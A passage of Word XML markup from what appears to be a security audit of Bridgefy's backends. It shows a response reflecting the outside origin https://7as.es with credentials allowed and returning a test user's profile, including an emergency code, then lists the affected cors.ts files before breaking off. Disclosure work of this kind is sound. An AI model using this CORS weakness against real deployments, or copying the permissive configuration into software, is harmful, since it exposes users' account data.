          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>charset=utf-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>8 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>[...]</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>https://7as.es</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Vary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="32"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Credentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="63"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="585" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"response"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe4319370"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"firstName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Julian</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-25"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Test"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"lastName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"de </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>la</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="388" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Orta"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"country"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"60d25aaed1fe3a324c1fbf28"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"name"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Mexico"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>},</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"industry"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Tech"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"ro le"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Engineering/Product"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"client"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"639893112017b2dfe431936e"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyName"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Bridgefy"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"companyWebsite"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"bridgefy.me"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"use"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"Messaging"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"emergencyCode"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"46D5356E"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"termsAccep ted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"useBridgefySDK"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"profileCompleted"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"twoFactor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"subscriptionU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>ntil"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="DE4F00"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"December 13, 2022"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>"planActive"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="219"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>cause</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>issue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>can</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>found</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>following</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Files:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend/src/api/config/cors.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="38"/>
        <w:ind w:left="720" w:right="3596" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-backend/tree/staging/src/api/config/cors.ts bridgefy-sdk-backend/src/api/config/cors.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-sdk-backend/tree/staging/src/api/config/cors.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Code:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="36"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>export </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="A61C5C"/>
